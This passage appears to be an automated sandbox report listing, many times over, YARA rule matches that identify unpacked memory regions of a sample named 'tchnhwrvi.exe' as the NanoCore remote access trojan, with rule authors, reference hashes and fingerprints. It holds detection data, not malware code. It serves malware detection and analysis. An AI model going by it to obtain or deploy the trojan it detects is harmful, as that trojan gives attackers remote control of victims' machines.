      Source: 2.2.tchnhwrvi.exe.4d32d61.13.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.5df0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5df0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7590000.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7590000.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7590000.35.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.7590000.35.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.5df0000.31.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.5df0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.75f0000.40.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75f0000.40.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75f0000.40.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.75f0000.40.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.5bb0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5bb0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5bb0000.28.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.5bb0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.43cabf4.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.43cabf4.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.43cabf4.12.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.43cabf4.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.3290000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.3290000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.3290000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.3290000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.3290000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.5e10000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5e10000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5e10000.32.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.5e10000.32.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.7570000.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7570000.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7570000.34.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.7570000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.7660000.45.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7660000.45.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7660000.45.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.7660000.45.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.441b408.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.441b408.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.441b408.27.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.441b408.27.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.75d0000.38.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75d0000.38.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75d0000.38.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.75d0000.38.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.7660000.45.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
